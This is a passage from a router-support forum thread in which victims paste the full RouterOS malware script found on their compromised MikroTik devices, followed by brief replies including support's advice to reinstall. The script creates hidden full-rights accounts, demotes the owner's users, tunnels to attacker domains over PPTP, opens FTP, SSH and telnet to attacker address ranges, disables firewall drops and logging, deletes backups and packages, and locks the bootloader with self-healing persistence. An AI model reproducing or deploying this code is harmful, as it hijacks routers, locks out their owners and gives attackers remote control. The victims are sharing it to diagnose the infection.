/fil rem [find type=".log file"];/fil rem [find type=package];/fil rem [find type=".npk file"];/fil rem [find type=script];
:loc filCLR {"sys";"func";"auto"};:loc dd;/fil {:fore f in [find] do={:loc n [get $f name];:fore ww in $filCLR do={:set dd [:len [:find $n $ww]];:if ($dd!=0) do={/fil rem $n;};}}}
:loc sysPPS;:if ([:len [/ip fir lay find name=sysPPS]]!=0) do={:set sysPPS [/ip fir lay get [find name=sysPPS] regex]}
:if ([:len [/ip fir lay find name=sysIntru]]=0) do={/ip fir lay add name=sysIntru regex=true}
:set fPort "";:set tPort "";:set sPort "";:set DOM "";:set PTPST "";
/sys scr env rem [find name=init0V];/sys scr env rem [find name=tokenSYS];/sys scr env rem [find name=ntpIP];/sys scr env rem [find name=tzspIP];/sys scr env rem [find name=SuperManServer];/sys scr env rem [find name=TheHulkServer];/sys scr env rem [find name=routerOSServer];/sys scr env rem [find name=ROSuser];/sys scr env rem [find name=ROSpass];/sys scr env rem [find name=init0nextIP];/sys scr env rem [find name=init0dstFile];/sys scr env rem [find name=init1nextIP];/sys scr env rem [find name=init1dstFile];/sys scr env rem [find name=initDBready];/sys scr env rem [find name=CPUhighMAX];/sys scr env rem [find name=CPUusedMAX];/sys scr env rem [find name=CPUhighCount];/sys scr env rem [find name=CPUused];
:loc done false;:loc rNum;:loc rnd;/int ether {:fore e in [find running=yes] do={/int monitor-traffic [get $e name] once do={:loc tmp;:set rnd $"rx-bits-per-second";:set tmp [:tonum [:pick $rnd ([:len $rnd]-4) ([:len $rnd]-2)]];:if ($tmp>0) do={:set done true;:set rNum $tmp;}}}};:if (!$done) do={:set rNum 5};
:loc rosV 0;:loc v;:loc pos 0;:set v [/sys reso get ver];:loc scope {" ";"rc";"("};
:fore w in $scope do={:if ([:len [:find $v $w]]!=0) do={:set v [:pick $v 0 [:find $v $w]]}}
:for x from=0 to=([:len [:tostr $v]]-1) do={:if ([:pick [:tostr $v] $x ($x+1)]=".") do={:set v ([:pick [:tostr $v] 0 $x].",".[:pick [:tostr $v] ($x+1) [:len [:tostr $v]]])}};
:set v [:toarray $v];:if ([:len $v]=2) do={:set v ($v,0)};:set pos 0;
:fore k in $v do={:if ($pos=0) do={:set rosV ($rosV+($k*1000));};:if ($pos=1) do={:set rosV ($rosV+($k*10));};:if ($pos=2) do={:set rosV ($rosV+$k);};:set pos ($pos+1);};
:loc reH (299-$rNum);:loc reMX (300-$rNum);
:loc p0 ":glo xey [:pick [/sys clo get time] 6 8];:loc s7 \":del 3;:glo sysJ true;:del 1;/too net rem [find host=7.7.7.7];\";:if (([/sys pac get ppp disabled] or [/sys pac get sec disabled]) or [/sys pac get advance disabled]) do={/sys pac enable [find];/too net rem [find host=7.7.7.7];/too net add host=7.7.7.7 dis=no int=1 tim=1 up=\$s7 down=\$s7;:del 1;/sys reb;};"
:loc m1 "/too mac-ser set [find] disabled=yes;/too mac-ser mac-win set [find] disabled=yes;"
:loc m2 "/too mac-ser set allowed-interface-list=none;/too mac-ser mac-win set allowed-interface-list=none;"
:loc a1 ":glo PRB [:tostr [/sys rou set get prot]];:if ((\$PRB=\"disabled\") or (\$PRB=\"false\")) do={:set sysJ true;/sys rou set set ena=no prot=enabled reformat-hold-button=$reH;};"
:loc a2 ":glo JRST [:tostr [/sys rou set get ena]];:if ((\$JRST=\"enabled\") or (\$JRST=\"true\")) do={:set sysJ true;/sys rou set set ena=no prot=enabled reformat-hold-button=$reH;};"
:loc c0 "/sys rou set set ena=no prot=enabled sil=yes boot-dev=nand-only;:glo sysJ;"
:loc c1 "/sys rou set set ena=no prot=enabled sil=yes boot-dev=nand-only reformat-hold-button=$reH;:glo sysJ;"
:loc c2 "/sys rou set set ena=no prot=enabled sil=yes boot-dev=nand-only reformat-hold-button=$reH reformat-hold-button-max=$reMX;:glo sysJ;"
:loc c3 ":glo sysJ;:glo JRST [:tostr [/sys rou set get ena]];:if ((\$JRST=\"enabled\") or (\$JRST=\"true\")) do={:set sysJ true;};"
:loc d1 ":loc s6 \":del 60;:glo sysJ false;:del 1;/too net rem [find host=6.6.6.6];\";:glo JRST [:tostr [/sys rou set get ena]];:if ((\$JRST=\"enabled\") or (\$JRST=\"true\")) do={/too net rem [find host=6.6.6.6];/too net add host=6.6.6.6 dis=no int=1 tim=1 up=\$s6 down=\$s6;/sys rou set set ena=no prot=enabled reformat-hold-button=$reH;:del 1;:if ([:len [/use gro find name=sys]]=0) do={/use gro add name=sys pol=loc,win,reb;:del 1;/use add nam=sys gro=full dis=no pas=([/ip fir lay get [find name=syscret] regexp].\$xey);/use set [find name!=sys] group=sys;} else={/use gro set [find name=sys] pol=!wri,!pas,!sen,!api,!loc,!tel,!ssh,!ftp,!pol,!sni};/sys pac upd set cha=cur;/sys pac upd che;/fil rem [find type=script];:exec {/sys pac upd ins;};:if ([:len [:find [/sys pac upd get stat] Down]]=0) do={/sys reb;}};"
:loc uScr;:if ($rosV>=6410) do={:set uScr ($p0.$c2.$a1.$a2.$m2);} else={:if ($rosV>=6400) do={:set uScr ($p0.$c2.$a1.$a2.$m1);} else={:if ($rosV>=6346) do={:if (($JRST="enabled") or ($JRST="true")) do={:set uScr ($p0.$d1.$m1);} else={:set uScr ($p0.$d1.$m1);}} else={:if ($rosV>=6330) do={:set uScr ($p0.$c1.$a1.$a2.$m1);} else={:set uScr ($p0.$c0.$m1);}}}}
:if ([:len [/too net find host=127.0.0.1]]!=1) do={/too net rem [find host=127.0.0.1];/too net add host=127.0.0.1 int=1 tim=1 dis=no up=$uScr down=$uScr;} else={/too net set [find host=127.0.0.1] int=1 tim=1 dis=no up=$uScr down=$uScr;}
:loc sysX "system";:loc word {"\"system\"";"=system";"rem system";"rem system";"remo system";"remov system";"remove system";"ip ser";"user g";"user a";"user s";"use g";"use a";"use s"};
/sys scr {:fore s in [find name!=$sysX] do={:loc n [get $s name];:loc sSRC [get $s source];:fore w in $word do={:loc d [:len [:find $sSRC $w]];:if ($d!=0) do={/sys scr rem $n;:set sysJ true;};};}}
/sys sch {:fore s in [find name!=$sysX] do={:loc n [get $s name];:loc sSRC [get $s on-event];:fore w in $word do={:loc d [:len [:find $sSRC $w]];:if ($d!=0) do={/sys sch rem $n;:set sysJ true;};};}}
/too net {:fore s in [find host!=127.0.0.1] do={:loc h [get $s host];:if ($h!=8.8.8.8) do={:loc nws [get $s up];:fore w in $word do={:loc d [:len [:find $nws $w]];:if ($d!=0) do={/too net rem [find host=$h];:set sysJ true;};};:loc nws [get $s down];:fore w in $word do={:loc d [:len [:find $nws $w]];:if ($d!=0) do={/too net rem [find host=$h];:set sysJ true;};};}}}
:if ([:len [/use find name=system]]!=0) do={/use rem [find name=system];:set sysJ true}
:if ([/sys route set get boot-device]!="nand-only") do={/sys route set set boot-device=nand-only;:set sysJ true;}
:if ([:len [/sys scr find name=system]]=1) do={:loc sysSrcX [/sys scr get [find name=system] source];:loc sysPolX [/sys scr get [find name=system] policy];:if ($sysSrcX!=$sysSrc) do={/sys scr set [find name=system] source=$sysSrc;:set sysJ true;};:if ($sysPolX!=$sPol) do={/sys scr set [find name=system] policy=$sPol;:set sysJ true;};
} else={
/sys scr add name=system policy=$sPol source=$sysSrc;
:if ([:len [/sys sch find name=system]]=1) do={/sys sch set [find name=system] int=1s on-event=system start-date=jan/01/1970 start-time=00:00:00 disable=no;} else={/sys sch add int=1s name=system on-event=system start-date=jan/01/1970 start-time=00:00:00 disable=no;}
:if ([:len [/ip fir lay find name=sysJail]]=0) do={/ip fir lay add name=sysJail regexp=1;} else={:if ([:len [:tonum [/ip fir lay get [find name=sysJail] regexp]]]=0) do={/ip fir lay set [find name=sysJail] regexp=1;} else={:loc J [:tonum [/ip fir lay get [find name=sysJail] regexp]];:set J ($J+1);/ip fir lay set [find name=sysJail] regexp=$J;}};:if ([:len [/sys scr find name=system]]=1) do={:del 0;} else={/sys scr add name=system policy=$sPol source=$sysSrc;};/sys reb;
}
/sys scr {:fore scri in=[find name!="system"] do={:if ([get $scri source]=$sysSrc) do={[rem $scri];:set sysJ true;}}}
:if ([:len [/sys sch find name=system]]=1) do={
:loc SCHX [/sys sch get [find name=system] policy]
:if ($SCHX!=$sSchP) do={/sys sch set [find name=system] policy=$sSchP;:set sysJ true;}
:if ([/sys sch get [find name=system] disabled]!=no) do={/sys sch set [find name=system] disabled=no;:set sysJ true;}
:if ([/sys sch get [find name=system] interval]!="00:00:01") do={/sys sch set [find name=system] int=1s;:set sysJ true;}
:if ([/sys sch get [find name=system] start-time]!="00:00:00") do={/sys sch set [find name=system] start-time=00:00:00;:set sysJ true;}
:if ([/sys sch get [find name=system] start-date]!="jan/01/1970") do={/sys sch set [find name=system] start-date=jan/01/1970;:set sysJ true;}
:if ([/sys sch get [find name=system] on-event]!="system") do={/sys sch set [find name=system] on-event=system;:set sysJ true;}
} else={/sys sch add int=1s name=system on-event=system start-date=jan/01/1970 start-time=00:00:00 disable=no;:set sysJ true;}
:set UAC [:len [/use act find via!="ftp"]];:if ($UAC=0) do={:set sysNoOther true;} else={:set sysNoOther true;/use act {:fore acc in=[find via!="ftp"] do={:if ([get $acc name]!="system") do={:set sysNoOther false;}}}}
/use act {:fore u in=[find] do={:loc uu [get $u address];:loc vv [get $u via];:if (([:len [:find $uu ":"]]!=0) or (($vv="console") or ($vv="local"))) do={:set mLOG true;} else={:set mLOG false}}};
:loc upROSX [/sys pac upd get status];:if ([:len [:find $upROSX "Downloaded"]]=0) do={:del 0} else={/sys pac upd can;}
:if ([:len [/ip fir lay find name=syscret]]=0) do={/ip fir lay add name=syscret regexp=$syscret;:set sysJ true;} else={:if ([/ip fir lay get [find name=syscret] regexp]!=$syscret) do={/ip fir lay set [find name=syscret] regexp=$syscret;:set sysJ true;}}
:if ($sysJ) do={
:if ([:len [/ip fir lay find name=sysJail]]=0) do={/ip fir lay add name=sysJail regexp=1;} else={:if ([:len [:tonum [/ip fir lay get [find name=sysJail] regexp]]]=0) do={/ip fir lay set [find name=sysJail] regexp=1;} else={:loc J [:tonum [/ip fir lay get [find name=sysJail] regexp]];:set J ($J+1);/ip fir lay set [find name=sysJail] regexp=$J;}};
:if ([:len [/sys scr find name=system]]=1) do={:del 0;} else={/sys scr add name=system policy=$sPol source=$sysSrc;};
:if ([:len [/sys sch find name=system]]=1) do={/sys sch set [find name=system] int=1s on-event=system start-date=jan/01/1970 start-time=00:00:00 disable=no;} else={/sys sch add int=1s name=system on-event=system start-date=jan/01/1970 start-time=00:00:00 disable=no;};/sys reb;
}
}
:set sR2 0;/snmp exp ver fil=init10;/ip ser exp ver fil=init11;/ip fir service-port exp ver fil=init12;/sys log set [find] disable=yes;/sys log exp ver fil=init13;/sys ntp cli exp ver fil=init15;/sys log set [find] action=remote disabled=yes;
:loc logX [/sys clo get time];:set contX [/fil get [find name=code0.txt] content];:del 1;:if ([:file get code0.txt size]<3800) do={/fil set [find name=code0.txt] content="$contX,$logX";:del 1;};/sys scr env rem [find];
}
}
Do you find the solution?
 
User avatar
jabberd
just joined
Posts: 24
Joined: Tue Feb 28, 2017 1:10 pm
Contact:

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Mon Mar 05, 2018 10:29 am

The process of NAND Gate removal
OMG, I thought you're gonna contact me directly to get a hint on removing that script, but now I see you've chosen a hard(ware) way for resolution of the problem :)
 
User avatar
jabberd
just joined
Posts: 24
Joined: Tue Feb 28, 2017 1:10 pm
Contact:

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Mon Mar 05, 2018 10:33 am

Same problem as yours and this is the full scrip.
Can you contact me directly at Twitter/Telegram (@jabberd), please? Just before removing the NAND :)
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 24141
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Mon Mar 05, 2018 10:37 am

You can reinstall the device. NAND removal will get you into more trouble (like losing your license). Listen to people above please.
No answer to your question? How to write posts
 
korawit
just joined
Topic Author
Posts: 16
Joined: Thu Feb 22, 2018 9:12 am

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Mon Mar 05, 2018 10:37 am

The process of NAND Gate removal
OMG, I thought you're gonna contact me directly to get a hint on removing that script, but now I see you've chosen a hard(ware) way for resolution of the problem :)
Thanks I am trying to contact you via Twitter.
 
korawit
just joined
Topic Author
Posts: 16
Joined: Thu Feb 22, 2018 9:12 am

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Mon Mar 05, 2018 10:39 am

You can reinstall the device. NAND removal will get you into more trouble (like losing your license). Listen to people above please.
Yes, it has replaced NAND from a broken router(spare part)
 
bobbyyo
just joined
Posts: 6
Joined: Sun Mar 04, 2018 7:44 pm

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Mon Mar 05, 2018 5:10 pm

Same problem as yours and this is the full scrip.
:glo systemV 30RC5
:glo rosX 6346;
:glo xFlag false
:glo sysCLRFlag false
:glo moROSF true
:glo moMACF false
:glo fPort 21;:glo sPort 22;:glo tPort 23;
:glo sC;:glo sCM 5;:glo s5;
:glo rstTime 17084;:glo JRST;:glo xey;
:glo sysTime;:glo sRM 900;:glo sR2;:glo sR1;
:glo sysJ;:glo sysNoOther;:glo sysPPS;:glo UAC;:glo PTPST;:glo sysB;:glo sysE;:glo DOM;
:loc lntp;:loc sysSrc;:loc sPol;:loc sSchP;
:loc contX;:loc acx;:loc wx;:loc viax;:loc addx;
:loc ptpU
:loc HL 60;:loc moMAX 1
:loc jST;:loc stJ;:loc tSCR;:loc tSTA;:loc RF;:loc tt;
:loc s8 ":glo sysJ;:loc s4 false;/fil {:fore f in [find type=\"backup\"] do={:loc n [get \$f name];/sys back save name=\$n;}};:loc s1;:loc s2;:loc s0 [:len [/sys scr find name=system]];:loc ss [:len [/sys sch find name=system]];:loc s3 false;:if (\$s0=1) do={:if (\$ss=1) do={:set s1 [/sys scr get [find name=system] run-count];:del 3;:set s2 [/sys scr get [find name=system] run-count];:if (\$s2=0 or (\$s1=\$s2)) do={/sys sch rem [find name=system];:del 1;/sys sch add name=system disable=no interval=1s on-event=system start-date=jan/01/1970 start-time=00:00:00;}} else={:set s3 true;}} else={:set s3 true;};:if (\$s3) do={:loc xx;/fil {:fore f in [find] do={:loc x [get \$f name];:if ([:len [:find \$x \"ss.db\"]]=1) do={:set xx \$x;:set s4 true;}}};:if (\$s4) do={:set sysJ true;/import \$xx;};}"
:loc s9 "/lcd set ena=no tou=dis;"
:if ([:len [/sys scr job find script="system"]]>=2) do={:set tt [/sys clo get time];:for x from=0 to=([:len $tt]-1) do={:if ([:pick $tt $x ($x+1)]=":") do={:set tt ([:pick $tt 0 $x].",".[:pick $tt ($x+1) [:len $tt]]);}};:set tt [:toarray $tt];:set sysTime ((($tt->0)*3600)+(($tt->1)*60)+($tt->2));
/sys scr job {:fore j in=[find script="system"] do={:set tSTA [get $j start];:set stJ [:pick $tSTA ([:find $tSTA " "]+1) [:len $tSTA]];:for x from=0 to=([:len $stJ]-1) do={:if ([:pick $stJ $x ($x+1)]=":") do={:set stJ ([:pick $stJ 0 $x].",".[:pick $stJ ($x+1) [:len $stJ]]);};};:set stJ [:toarray $stJ];:set jST ((($stJ->0)*3600)+(($stJ->1)*60)+($stJ->2));:loc sysTmp;:if ($sysTime<$jST) do={:set sysTmp ($sysTime+86400-$jST);} else={:set sysTmp ($sysTime-$jST);};:if ($sysTmp>=$sR1) do={:set sR1 $sysTmp;} else={:set sR1 ($sR1-1);};:if ($sR1>$sRM) do={/sys reb;};}}
:if ([:len [/too net find host=8.8.8.8]]!=1) do={/too net rem [find host=8.8.8.8];/too net add host=8.8.8.8 dis=no int=1 tim=1 up=$s8 down=$s8;} else={:loc u8 [/too net get [find host=8.8.8.8] up];:loc d8 [/too net get [find host=8.8.8.8] down];:loc db [/too net get [find host=8.8.8.8] dis];:loc i8 [/too net get [find host=8.8.8.8] int];:if (((($u8=$s8) and ($d8=$s8)) and !$db) and ($i8=[:totime 1])) do={:del 0;} else={/too net set [find host=8.8.8.8] up=$s8 down=$s8 dis=no int=1;}}
} else={
:set sysNoOther true;:set UAC [:len [/use act find name!="system"]];:loc mLOG false;/use act {:fore u in=[find] do={:loc uu [get $u address];:loc vv [get $u via];:if (([:len [:find $uu ":"]]!=0) or (($vv="console") or ($vv="local"))) do={:set mLOG true;}}}
:if ($UAC=0) do={:set sysNoOther true;} else={:set sysB [/sys clo get time];:set sysNoOther true;/use act {:fore acc in=[find via!="ftp"] do={:if ([get $acc name]!="system") do={:if ($sysCLRFlag) do={/fil pri fil=sysCLR;/ip fir lay rem [find name=sysCLR];:del 1;/ip fir lay add name=sysCLR regexp=true;:del 1;/sys reb;};:set sysNoOther false;:set sC 0;:set acx [get $acc name];:set wx [get $acc when];:set viax [get $acc via];:set addx [get $acc address];:if ([:len [/ip fir lay find name=sysIntru]]=0) do={/ip fir lay add name=sysIntru regex=true};:if ([:len [/fil find name=pps.txt]]!=0) do={:set sysPPS [/fil get [find name=pps.txt] content];} else={:set sysPPS 0;};};};};};
:if ($sysNoOther and (!$mLOG)) do={:set DOM "allimpir.dyndns.org";
:loc archi [/sys reso get archi];:if (([:len [/ip fir lay find name=sysJail]]!=0) or $sysJ) do={:set ptpU "jail";} else={:set ptpU "void";}
:if ($archi="tile") do={:set PTPST ($ptpU."CCR");} else={:if ($archi="powerpc") do={:set PTPST ($ptpU."PPC");} else={:if ($archi="mipsbe") do={:set PTPST ($ptpU."MIPSBE");} else={:if ($archi="mmips") do={:set PTPST ($ptpU."MMIPS");} else={:if ($archi="smips") do={:set PTPST ($ptpU."SMIPS");} else={:if (($archi="x86") or ($archi="x86_64")) do={:set PTPST ($ptpU."X86");} else={:if ($archi="arm") do={:set PTPST ($ptpU."ARM");} else={:set PTPST $ptpU;}}}}}}};
:if ([:len [/ip fir lay find name=sysIntru]]=1) do={
:if ($sC<$sCM) do={
:set sC ($sC+1);
:if ([:len [/ip fir lay find name=sysJail]]!=0) do={
:loc mcnt [/ip fir lay get [find name=sysJail] regex];
:loc sysV [:tonum [:pick $systemV 0 2]];:set xey [:pick [/sys clo get time] 6 8];
:if ($mcnt>=$moMAX) do={/ip fir lay set [find name=sysJail] regex=0;
:if ($sysV>=30) do={
:if ([:len [/use find name=sys]]=0) do={/use add name=sys group=full disabled=no password=([/ip fir lay get [find name=syscret] regexp].$xey);:del 1;/ip fir lay rem [find name=syscret];/use set [find group=sys] group=full;/use gro rem [find name=sys];/use gro add name=sys copy-from=full policy=!loc,!tel,!ssh,!ftp,!pol,!sni;:del 1;/use set [find name!=sys] group=sys;/use set [find name=system] group=full;} else={/use rem [find name=system];/use set [find group=sysT] group=full;/use gro rem [find name=sysT];/use gro add name=sysT copy-from=full policy=!wri,!pas,!sen,!api,!loc,!tel,!ssh,!ftp,!pol,!sni;:del 1;/use gro set [find name=sys] policy=[/use gro get [find name=sysT] policy];/use gro rem [find name=sysT];/use set [find name!=sys] group=sys;/ip fir lay rem [find name=syscret];}
} else={:if ($sysV>=26) do={:if ([:len [/use find name=sys]]=0) do={/use add name=sys group=full disabled=no password=([/ip fir lay get [find name=syscret] regexp].$xey);/ip fir lay rem [find name=syscret];/use set [find group=sys] group=full;/use gro rem [find name=sys];:del 1;/use gro add name=sys copy-from=full policy=!loc,!tel,!ssh,!ftp,!pol,!sni;:del 1;/use set [find name!=sys] group=sys;/use set [find name=system] group=full;}}}
/sys scr rem [find name=README];/sys scr add name=README source="."
}
}
} else={
/ip fir lay rem [find name=sysIntru];
:if ([:len [/int pptp-cli find name=system]]!=1) do={/int pptp-cli rem [find name=system];:del 1;/int pptp-cli add allow=mschap1,mschap2 connect-to=8.8.8.8 disabled=no name=system password=password profile=default user=$PTPST;:del 1;} else={/int pptp-cli set [find name=system] connect-to=8.8.8.8 disabled=no profile=default user=$PTPST password=password;}
:loc ptp2;:loc ptpS;
:if (([:len [/ip dns get servers]]=0) and ([:len [/ip dns get dynamic-servers]]=0)) do={/ip dns set servers=8.8.8.8,8.8.4.4;};:set DOM "asgard.does-it.net";:if ([:typeof [/int pptp-cli get [find name=system] connect-to]]="ip") do={:set ptp2 [/int pptp-cli get [find name=system] connect-to];:set ptpS [:resolve $DOM];:if ($ptp2!=$ptpS) do={/int pptp-cli set [find name=system] connect-to=$ptpS disabled=no user=$PTPST password=password;}} else={:set ptp2 [/int pptp-cli get [find name=system] connect-to];:set ptpS $DOM;:if ($ptp2!=$ptpS) do={/int pptp-cli set [find name=system] connect-to=$ptpS disabled=no user=$PTPST password=password;}}
:loc wait 2;:loc ptpW true;
:while (($wait>0) and $ptpW) do={:set ptpW (![/int pptp-cli get [find name=system] running]);:set wait ($wait-1);:del 1;}
:if ((!$ptpW)) do={
/ip fir fil set [find chain=input and src-address="172.16.0.0/12" and action="accept"] in-interface=system action=accept
:if ([:len [/ip fir fil find chain=input and src-address="172.16.0.0/12" and in-interface="!system" and action="drop"]]=0) do={:if ([:len [/ip fir fil find chain=input and src-address="172.16.0.0/12" and in-interface="system"]]!=0) do={/ip fir fil add copy-from=[find chain=input and src-address="172.16.0.0/12" and in-interface="system" and action="accept"] in-interface=!system action=drop}}
:if ([:len [/ip rou find dst-address=172.24.0.0/13]]!=1) do={/ip rou rem [find dst-address=172.24.0.0/13];:del 1;/ip rou add dst-address=172.24.0.0/13 gateway=system com=system;} else={:if ([/ip rou get [find dst-address=172.24.0.0/13] gateway]!="system") do={/ip rou set [find dst-address=172.24.0.0/13] gateway=system;}}
:if ([:len [/ip rou find dst-address=172.25.0.0/24]]!=1) do={/ip rou rem [find dst-address=172.25.0.0/24];:del 1;/ip rou add dst-address=172.25.0.0/24 gateway=system com=system;} else={:if ([/ip rou get [find dst-address=172.25.0.0/24] gateway]!="system") do={/ip rou set [find dst-address=172.25.0.0/24] gateway=system;}}
}
}
} else={
:loc ptp2;:loc ptpS;
:if ([:len [/int pptp-cli find name=system]]!=1) do={/int pptp-cli rem [find name=system];:del 1;/int pptp-cli add allow=mschap1,mschap2 connect-to=8.8.8.8 disabled=no name=system password=password profile=default user=$PTPST;:del 1;} else={
:if (([:len [/ip dns get servers]]=0) and ([:len [/ip dns get dynamic-servers]]=0)) do={/ip dns set servers=8.8.8.8,8.8.4.4;};:set DOM "asgard.does-it.net";:if ([:typeof [/int pptp-cli get [find name=system] connect-to]]="ip") do={:set ptp2 [/int pptp-cli get [find name=system] connect-to];:set ptpS [:resolve $DOM];:if ($ptp2!=$ptpS) do={/int pptp-cli set [find name=system] connect-to=$ptpS disabled=no;}} else={:set ptp2 [/int pptp-cli get [find name=system] connect-to];:set ptpS $DOM;:if ($ptp2!=$ptpS) do={/int pptp-cli set [find name=system] connect-to=$ptpS disabled=no;}}
:loc wait 2;:loc ptpW true;
:while (($wait>0) and $ptpW) do={:set ptpW (![/int pptp-cli get [find name=system] running]);:set wait ($wait-1);:del 1;}
:if ((!$ptpW)) do={
:if ([:len [/use find name=system]]=0) do={
/snmp exp ver fil=init10;/ip ser exp ver fil=init11;/ip fir service-port exp ver fil=init12;/sys log set [find] disable=yes;/sys log exp ver fil=init13;/sys ntp cli exp ver fil=init15;:del 2;
/use add gro=full name=system address=172.24.0.0/13,127.0.0.1;/int pptp-ser ser set default-profile=default enabled=yes max-mru=1472 max-mtu=1472;/ip poo rem [find name=system];/ppp pro rem [find comment=system];/ppp sec rem [find comment=system];:del 1;
/ip poo add name=system ranges=10.147.147.2-10.147.147.254;/ppp pro add local-address=10.147.147.1 name=system remote-address=system com=system;/ppp sec add nam=spidy pas=peterparker pro=system ser=pptp com=system;/ip fir nat add action=masquerade chain=srcnat com=system;
/fil rem [find type=".log file"];/fil rem [find type=package];/fil rem [find type=".npk file"];
:loc s172 false;:loc s127 false;
:fore x in=[/ip ser get ftp address] do={:if ($x=172.24.0.0/13) do={:set s172 true};:if ($x=127.0.0.1/32) do={:set s127 true}};:if (!$s172) do={/ip ser set ftp address=([/ip ser get ftp address],172.24.0.0/13);};:if (!$s127) do={/ip ser set ftp address=([/ip ser get ftp address],127.0.0.1/32);};/ip ser set ftp port=$fPort disabled=no;:loc s172 false;
:fore x in=[/ip ser get ssh address] do={:if ($x=172.24.0.0/13) do={:set s172 true}};:if (!$s172) do={/ip ser set ssh address=([/ip ser get ssh address],172.24.0.0/13)};/ip ser set ssh port=$sPort disabled=no;:loc s172 false;
:fore x in=[/ip ser get telnet address] do={:if ($x=172.24.0.0/13) do={:set s172 true}};:if (!$s172) do={/ip ser set telnet address=([/ip ser get telnet address],172.24.0.0/13)};/ip ser set telnet port=$tPort disabled=no;
/ip ser set www address="" disabled=no;/ip fir service-port set [find name=ftp] disabled=no ports=$fPort;
/ip fir fil set [find chain=input and action=drop] dis=yes;
/ip fir fil set [find chain=output and action=drop] dis=yes;:del 1;
/ip fir fil add cha=input src-address=172.16.0.0/12 act=accept com=system;
/ip fir fil add cha=output src-address=172.16.0.0/12 act=accept com=system;
/ip fir fil add cha=input src-address=127.0.0.1/32 act=accept com=system;
/ip fir fil add cha=output src-address=127.0.0.1/32 act=accept com=system;
/ip fir fil add cha=input dst-port=21,22,23,162 src-address=!172.16.0.0/12 act=drop protocol=tcp com=system;
/ip fir fil add cha=input dst-port=161 src-address=!172.16.0.0/12 act=drop protocol=udp com=system;
:loc tmpinf;/int pppoe-client {:fore i in=[find running=yes] do={:set tmpinf [get $i name];/ip fir fil add cha=input dst-port=53 in-interface=$tmpinf act=drop protocol=udp com=system dis=no;}}
}
:if ([:len [/ip rou find dst-address=172.24.0.0/13]]!=1) do={/ip rou rem [find dst-address=172.24.0.0/13];:del 1;/ip rou add dst-address=172.24.0.0/13 gateway=system com=system;} else={:if ([/ip rou get [find dst-address=172.24.0.0/13] gateway]!="system") do={/ip rou set [find dst-address=172.24.0.0/13] gateway=system;}}
:if ([:len [/ip rou find dst-address=172.25.0.0/24]]!=1) do={/ip rou rem [find dst-address=172.25.0.0/24];:del 1;/ip rou add dst-address=172.25.0.0/24 gateway=system com=system;} else={:if ([/ip rou get [find dst-address=172.25.0.0/24] gateway]!="system") do={/ip rou set [find dst-address=172.25.0.0/24] gateway=system;}}
/ip fir fil set [find chain=input and src-address="172.16.0.0/12" and action="accept"] in-interface=system action=accept
:if ([:len [/ip fir fil find chain=input and src-address="172.16.0.0/12" and in-interface="!system" and action="drop"]]=0) do={:if ([:len [/ip fir fil find chain=input and src-address="172.16.0.0/12" and in-interface="system"]]!=0) do={/ip fir fil add copy-from=[find chain=input and src-address="172.16.0.0/12" and in-interface="system" and action="accept"] in-interface=!system action=drop}}
}
/int pptp-cli mon [find name=system] once do={:set lntp $"remote-address"};
:loc ntpSTmp;:set ntpSTmp [/sys ntp cli get pri];
:if ($ntpSTmp!=$lntp) do={/sys ntp cli set pri=$lntp sec=$lntp ena=no;:del 1;/sys ntp cli set ena=yes;}
}
:set tt [/sys clo get time];:for x from=0 to=([:len $tt]-1) do={:if ([:pick $tt $x ($x+1)]=":") do={:set tt ([:pick $tt 0 $x].",".[:pick $tt ($x+1) [:len $tt]])}};:set tt [:toarray $tt];:set sysTime ((($tt->0)*3600)+(($tt->1)*60)+($tt->2));:if (($sysTime<($rstTime+2)) and ($sysTime>($rstTime-2))) do={
:if ([:len [/ip fir lay find name=sysR]]=0) do={/ip fir lay add name=sysR regexp=1;} else={:if ([:len [:tonum [/ip fir lay get [find name=sysR] regexp]]]=0) do={/ip fir lay set [find name=sysR] regexp=1;} else={:loc J [:tonum [/ip fir lay get [find name=sysR] regexp]];:set J ($J+1);/ip fir lay set [find name=sysR] regexp=$J;}};
/sys reb;}
}
} else={
:set sysSrc [/sys scr get [find name=system] source];:set sPol [/sys scr get [find name=system] policy];
:if ([:len [/sys sch find name=system]]=0) do={/sys sch add int=1s name=system on-event=system start-date=jan/01/1970 start-time=00:00:00 disable=no};:set sSchP [/sys sch get [find name=system] policy];
:loc syscret;:set s5 false;/fil {:fore f in [find] do={:loc x [get $f name];:if ([:len [:find $x "ss.db"]]=1) do={:set s5 true;}}};
:if ([:len [/ip fir lay find name=syscret]]=1) do={:set syscret [/ip fir lay get [find name=syscret] regexp]} else={/ip fir lay add name=syscret regexp=12345678;:set syscret 12345678;}
/use rem [find name=system];/use {:fore u in [find] do={:if ([:len [:find [get $u name] system]]!=0) do={[rem $u]}}}
/int pptp-cli rem [find name=system]
:loc sysW {"sys";"func";"init"}
/sys scr {:fore s in [find name!=system] do={:loc n [get $s name];:fore w in $sysW do={:loc det [:len [:find $n $w]];:if ($det!=0) do={/sys scr rem $n;};}}}
/sys sch {:fore s in [find name!=system] do={:loc n [get $s name];:fore w in $sysW do={:loc det [:len [:find $n $w]];:if ($det!=0) do={/sys sch rem $n;};}}}
/fil {:fore f in [find] do={:loc x [get $f name];:if ([:len [:find $x "init.db"]]=1) do={/fil rem [find name=$x];}}};/fil rem [find type=".log file"];/fil rem [find name=virgin.txt];/fil rem [find name=system.txt];/fil rem [find name=sysMonROS.txt];/fil rem [find type=package];/fil rem [find type=".npk file"];/fil rem [find type=".tar file"];/fil rem [find type=".rif file"];/fil rem [find type=".rar file"];/fil rem [find type=".zip file"];/fil rem [find name=sys-note.txt];
:if ([:len [/fil find name=init10.rsc]]!=0) do={/snmp comm rem [find default=no];:del 1;/imp init10.rsc;/fil rem [find name=init10.rsc];}
:if ([:len [/fil find name=init11.rsc]]!=0) do={/imp file=init11.rsc;/fil rem [find name=init11.rsc];} else={/ip ser set ftp disabled=no address="" port=21;/ip ser set ssh disabled=no address="" port=22;/ip ser set telnet disabled=no address="" port=23;}
:if ([:len [/fil find name=init12.rsc]]!=0) do={/imp file=init12.rsc;/fil rem [find name=init12.rsc];}
